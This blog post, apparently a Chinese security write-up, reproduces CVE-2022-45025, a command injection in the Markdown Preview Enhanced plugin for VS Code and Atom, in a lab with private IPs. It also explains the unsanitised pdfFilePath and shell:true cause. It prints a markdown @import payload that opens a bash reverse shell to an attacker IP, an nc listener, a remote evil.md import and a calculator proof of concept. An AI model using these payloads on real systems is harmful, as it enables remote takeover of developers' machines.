<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>利用Vscode插件反弹shell(cve-2022-45025) - W01fh4cker&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="W01fh4cker"><meta name="msapplication-TileImage" content="/img/avatar.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="W01fh4cker"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="前言最近乌克兰安全研究员Yurii Sanin公开了漏洞CVE-2022-45025的漏洞细节，这里来个简单的复现。该漏洞是利用了VScode&amp;#x2F;Atom的Markdown Preview Enhanced for VSCode插件中的代码漏洞从而实现命令注入。"><meta property="og:type" content="blog"><meta property="og:title" content="利用Vscode插件反弹shell(cve-2022-45025)"><meta property="og:url" content="http://w01fh4cker.github.io/2022/12/11/cve_2022_45025/"><meta property="og:site_name" content="W01fh4cker&#039;s Blog"><meta property="og:description" content="前言最近乌克兰安全研究员Yurii Sanin公开了漏洞CVE-2022-45025的漏洞细节，这里来个简单的复现。该漏洞是利用了VScode&amp;#x2F;Atom的Markdown Preview Enhanced for VSCode插件中的代码漏洞从而实现命令注入。"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20221211184206.png"><meta property="article:published_time" content="2022-12-10T16:00:00.000Z"><meta property="article:modified_time" content="2022-12-20T15:24:59.868Z"><meta property="article:author" content="W01fh4cker"><meta property="article:tag" content="漏洞复现"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20221211184206.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://w01fh4cker.github.io/2022/12/11/cve_2022_45025/"},"headline":"利用Vscode插件反弹shell(cve-2022-45025)","image":["https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20221211184206.png"],"datePublished":"2022-12-10T16:00:00.000Z","dateModified":"2022-12-20T15:24:59.868Z","author":{"@type":"Person","name":"W01fh4cker"},"publisher":{"@type":"Organization","name":"W01fh4cker's Blog","logo":{"@type":"ImageObject","url":"http://w01fh4cker.github.io/img/avatar.png"}},"description":"前言最近乌克兰安全研究员Yurii Sanin公开了漏洞CVE-2022-45025的漏洞细节，这里来个简单的复现。该漏洞是利用了VScode&#x2F;Atom的Markdown Preview Enhanced for VSCode插件中的代码漏洞从而实现命令注入。"}</script><link rel="canonical" href="http://w01fh4cker.github.io/2022/12/11/cve_2022_45025/"><link rel="icon" href="/img/avatar.png"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }
          Array
              .from(document.querySelectorAll('.tab-content'))
              .forEach($tab => {
                  $tab.classList.add('is-hidden');
              });
          Array
              .from(document.querySelectorAll('.tabs li'))
              .forEach($tab => {
                  $tab.classList.remove('is-active');
              });
          const $activeTab = document.querySelector(location.hash);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
          const $tabMenu = document.querySelector(`a[href="${location.hash}"]`);
          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.2.0"></head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/avatar.png" alt="W01fh4cker&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Follow Me" href="https://github.com/W01fh4cker"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-6-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2022-12-10T16:00:00.000Z" title="2022-12-11 12:00:00 ├F10: AM┤">2022-12-11</time>发表</span><span class="level-item"><time dateTime="2022-12-20T15:24:59.868Z" title="2022-12-20 11:24:59 ├F10: PM┤">2022-12-20</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/re-vuln/">re_vuln</a></span><span class="level-item">3 分钟读完 (大约490个字)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">利用Vscode插件反弹shell(cve-2022-45025)</h1><div class="content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最近乌克兰安全研究员<code>Yurii Sanin</code>公开了漏洞<code>CVE-2022-45025</code>的漏洞细节，这里来个简单的复现。该漏洞是利用了<code>VScode</code>&#x2F;<code>Atom</code>的<code>Markdown Preview Enhanced for VSCode</code>插件中的代码漏洞从而实现命令注入。</p>
<span id="more"></span>

<h1 id="复现步骤"><a href="#复现步骤" class="headerlink" title="复现步骤"></a>复现步骤</h1><p>本文以<code>Ubuntu</code>为靶机，<code>Kali</code>为攻击机进行演示。<code>Ubuntu</code>的<code>IP</code>：<code>192.168.3.6</code>；<code>Kali</code>的<code>IP</code>：<code>192.168.3.16</code>。</p>
<p>现在<code>Kali</code>中关闭防火墙并启动<code>nc</code>监听：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo ufw <span class="built_in">disable</span></span><br><span class="line">nc -nlvp 9999</span><br></pre></td></tr></table></figure>

<p>然后在<code>Ubuntu</code>上执行如下命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo ufw <span class="built_in">disable</span></span><br><span class="line"><span class="built_in">touch</span> test.md</span><br></pre></td></tr></table></figure>

<p>然后用<code>VScode</code>打开该<code>markdown</code>文件，并确保<code>VScode</code>上面安装了<code>Markdown Preview Enhanced for VSCode</code>插件，如下图所示：</p>
<p><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/f55ed013a8dece91edba7e558455533.jpg"></p>
<p>然后我们在<code>test.md</code>中输入以下内容：</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- @import &quot;$(bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.3.16/9999 0&gt;&amp;1&#x27;| exit 0) new.pdf&quot;--&gt;</span><br><span class="line"><span class="section"># W01fh4cker hhh</span></span><br></pre></td></tr></table></figure>

<p>保存之后，点击右上角的第一个图标，也就是预览：</p>
<p><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20221211184206.png"></p>
<p>此时回到<code>kali</code>中，即可看到反弹<code>shell</code>成功：</p>
<p><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/e8159575366540e7a5a687e25825f1e.png"></p>
<h1 id="拓展"><a href="#拓展" class="headerlink" title="拓展"></a>拓展</h1><p>除了以上这些操作以外，我们也可以这么导入外部资源：</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- @import &quot;https://www.test.com/evil.md&quot; --&gt;</span><br><span class="line"><span class="section"># W01fh4cker hhh</span></span><br></pre></td></tr></table></figure>

<p>如果是<code>Mac</code>的话，还可以打开计算器：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- @import &quot;$(open -a Calculator &gt; /dev/null | exit 0)hello.pdf&quot; --&gt;</span><br></pre></td></tr></table></figure>

<h1 id="漏洞代码来源"><a href="#漏洞代码来源" class="headerlink" title="漏洞代码来源"></a>漏洞代码来源</h1><p>出问题的代码在这里：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/shd101wyy/mume/blob/7135d7606a6a57de6e2372c26a2f16bb98ecf2b2/src/pdf.ts">https://github.com/shd101wyy/mume/blob/7135d7606a6a57de6e2372c26a2f16bb98ecf2b2/src/pdf.ts</a></p>
</blockquote>
<p><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20221211184939.png"></p>
<p>由于没有对<code>pdfFilePath</code>参数的输入内容进行控制，因此我们传入恶意命令，参数拼接起来加上开启了<code> &#123; shell: true &#125;</code>，从而导致了命令执行漏洞的产生。</p>
<h1 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/11791">https://xz.aliyun.com/t/11791</a></p>
<p><a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=bnK5DPdb5JU">https://www.youtube.com/watch?v=bnK5DPdb5JU</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/yuriisanin/CVE-2022-45025">https://github.com/yuriisanin/CVE-2022-45025</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>利用Vscode插件反弹shell(cve-2022-45025)</p><p><a href="http://w01fh4cker.github.io/2022/12/11/cve_2022_45025/">http://w01fh4cker.github.io/2022/12/11/cve_2022_45025/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>W01fh4cker</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2022-12-11</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2022-12-20</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a></div><div class="a2a_kit a2a_kit_size_32 a2a_default_style"><a class="a2a_dd" target="_blank" rel="noopener" href="https://www.addtoany.com/share"></a><a class="a2a_button_facebook"></a><a class="a2a_button_twitter"></a><a class="a2a_button_email"></a><a class="a2a_button_whatsapp"></a><a class="a2a_button_telegram"></a><a class="a2a_button_reddit"></a><a class="a2a_button_tumblr"></a><a class="a2a_button_google_gmail"></a><a class="a2a_button_hacker_news"></a><a class="a2a_button_qzone"></a><a class="a2a_button_wechat"></a><a class="a2a_button_linkedin"></a><a class="a2a_button_yahoo_mail"></a><a class="a2a_button_evernote"></a></div><script src="https://static.addtoany.com/menu/page.js" defer></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" href="https://www.buymeacoffee.com/W01fh4cker" target="_blank" rel="noopener" data-type="buymeacoffee"><span class="icon is-small"><i class="fas fa-coffee"></i></span><span>送我杯咖啡</span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="https://s2.loli.net/2022/07/27/idXuzTqywkV7NjF.jpg" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2022/12/20/vulnstack5_shooting_range_records/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">红日靶场(5)打靶记录</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2022/11/26/warning_to_young_people/"><span class="level-item">敬告青年</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/disqusjs@1.3.0/dist/disqusjs.css"><div id="disqus_thread"><noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript></div><script src="https://cdn.jsdelivr.net/npm/disqusjs@1.3.0/dist/disqus.js"></script><script>new DisqusJS({
            shortname: 'w01fh4cker',
            apikey: "Fr04dPeNWib0C8ZzVJuAYl9UK9ufl87UtxWpR8t6p4R0E4u1jN0mne2ofKBlQEVu",
            siteName: "W01fh4cker's Blog",
            identifier: "2022/12/11/cve_2022_45025/",
            url: "http://w01fh4cker.github.io/2022/12/11/cve_2022_45025/",
            title: "利用Vscode插件反弹shell(cve-2022-45025)",
            api: "https://disqus.skk.moe/disqus/",
            admin: "W01fh4cker",
            adminLabel: "Admin",
            nesting: 4,
        });</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="https://s2.loli.net/2022/07/27/7qMhTcaQwXFyb3r.jpg" alt="W01fh4cker"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">W01fh4cker</p><p class="is-size-6 is-block">Doubt is the key to knowledge.</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Earth , Solar System</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">22</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">12</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">13</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/W01fh4cker" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/W01fh4cker"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Twitter" href="https://twitter.com/W01fh4cker"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">链接</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://twitter.com/W01fh4cker" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">my twitter</span></span><span class="level-right"><span class="level-item tag">twitter.com</span></span></a></li><li><a class="level is-mobile" href="https://github.com/W01fh4cker" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">my github</span></span><span class="level-right"><span class="level-item tag">github.com</span></span></a></li><li><a class="level is-mobile" href="https://space.bilibili.com/1910328085" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">my bilibili</span></span><span class="level-right"><span class="level-item tag">space.bilibili.com</span></span></a></li></ul></div></div></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/belief/"><span class="level-start"><span class="level-item">belief</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/bypass-av/"><span class="level-start"><span class="level-item">bypass_av</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/categories/c-plus-plus/"><span class="level-start"><span class="level-item">c_plus_plus</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/categories/go/"><span class="level-start"><span class="level-item">go</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/categories/hack-learning/"><span class="level-start"><span class="level-item">hack_learning</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/categories/hobby/"><span class="level-start"><span class="level-item">hobby</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/categories/java/"><span class="level-start"><span class="level-item">java</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/javascript/"><span class="level-start"><span class="level-item">javascript</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/php/"><span class="level-start"><span class="level-item">php</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/python/"><span class="level-start"><span class="level-item">python</span></span><span class="level-end"><span class="level-item tag">5</span></span></a></li><li><a class="level is-mobile" href="/categories/re-vuln/"><span class="level-start"><span class="level-item">re_vuln</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/solidity/"><span class="level-start"><span class="level-item">solidity</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><figure class="media-left"><a class="image" href="/2022/12/27/darkhole_record/"><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/1010066.jpg" alt="【Vulnhub】DarkHole打靶记录"></a></figure><div class="media-content"><p class="date"><time dateTime="2022-12-26T16:00:00.000Z">2022-12-27</time></p><p class="title"><a href="/2022/12/27/darkhole_record/">【Vulnhub】DarkHole打靶记录</a></p><p class="categories"><a href="/categories/hack-learning/">hack_learning</a></p></div></article><article class="media"><figure class="media-left"><a class="image" href="/2022/12/20/vulnstack5_shooting_range_records/"><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/1010066.jpg" alt="红日靶场(5)打靶记录"></a></figure><div class="media-content"><p class="date"><time dateTime="2022-12-19T16:00:00.000Z">2022-12-20</time></p><p class="title"><a href="/2022/12/20/vulnstack5_shooting_range_records/">红日靶场(5)打靶记录</a></p><p class="categories"><a href="/categories/hack-learning/">hack_learning</a></p></div></article><article class="media"><figure class="media-left"><a class="image" href="/2022/12/11/cve_2022_45025/"><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20221211184206.png" alt="利用Vscode插件反弹shell(cve-2022-45025)"></a></figure><div class="media-content"><p class="date"><time dateTime="2022-12-10T16:00:00.000Z">2022-12-11</time></p><p class="title"><a href="/2022/12/11/cve_2022_45025/">利用Vscode插件反弹shell(cve-2022-45025)</a></p><p class="categories"><a href="/categories/re-vuln/">re_vuln</a></p></div></article><article class="media"><figure class="media-left"><a class="image" href="/2022/11/26/warning_to_young_people/"><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/QQ图片20221126154955.jpg" alt="敬告青年"></a></figure><div class="media-content"><p class="date"><time dateTime="2022-11-25T16:00:00.000Z">2022-11-26</time></p><p class="title"><a href="/2022/11/26/warning_to_young_people/">敬告青年</a></p><p class="categories"><a href="/categories/belief/">belief</a></p></div></article><article class="media"><figure class="media-left"><a class="image" href="/2022/10/24/PyTorch_Deep_Learning_Notes/"><img src="https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20221024111154.png" alt="PyTorch深度学习笔记(持续更新)"></a></figure><div class="media-content"><p class="date"><time dateTime="2022-10-23T16:00:00.000Z">2022-10-24</time></p><p class="title"><a href="/2022/10/24/PyTorch_Deep_Learning_Notes/">PyTorch深度学习笔记(持续更新)</a></p><p class="categories"><a href="/categories/python/">python</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2022/12/"><span class="level-start"><span class="level-item">十二月 2022</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/11/"><span class="level-start"><span class="level-item">十一月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/10/"><span class="level-start"><span class="level-item">十月 2022</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/09/"><span class="level-start"><span class="level-item">九月 2022</span></span><span class="level-end"><span class="level-item tag">6</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/08/"><span class="level-start"><span class="level-item">八月 2022</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/07/"><span class="level-start"><span class="level-item">七月 2022</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/c-plus-plus%E5%AD%A6%E4%B9%A0/"><span class="tag">c_plus_plus学习</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/go%E5%AD%A6%E4%B9%A0/"><span class="tag">go学习</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/javascript%E5%AD%A6%E4%B9%A0/"><span class="tag">javascript学习</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/java%E5%AD%A6%E4%B9%A0/"><span class="tag">java学习</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/php%E5%AD%A6%E4%B9%A0/"><span class="tag">php学习</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/python%E5%AD%A6%E4%B9%A0/"><span class="tag">python学习</span><span class="tag">4</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E4%BF%A1%E4%BB%B0/"><span class="tag">信仰</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6/"><span class="tag">免杀研究</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AD%A6%E4%B9%A0/"><span class="tag">区块链学习</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/"><span class="tag">深度学习</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><span class="tag">漏洞复现</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%88%B1%E5%A5%BD/"><span class="tag">爱好</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E9%9D%B6%E5%9C%BA%E5%AD%A6%E4%B9%A0/"><span class="tag">靶场学习</span><span class="tag">2</span></a></div></div></div></div></div><div class="column-right-shadow is-hidden-widescreen is-sticky"></div></div><div class="column column-right is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#前言"><span class="level-left"><span class="level-item">1</span><span class="level-item">前言</span></span></a></li><li><a class="level is-mobile" href="#复现步骤"><span class="level-left"><span class="level-item">2</span><span class="level-item">复现步骤</span></span></a></li><li><a class="level is-mobile" href="#拓展"><span class="level-left"><span class="level-item">3</span><span class="level-item">拓展</span></span></a></li><li><a class="level is-mobile" href="#漏洞代码来源"><span class="level-left"><span class="level-item">4</span><span class="level-item">漏洞代码来源</span></span></a></li><li><a class="level is-mobile" href="#参考资料"><span class="level-left"><span class="level-item">5</span><span class="level-item">参考资料</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/avatar.png" alt="W01fh4cker&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2022 W01fh4cker</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download On Github" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>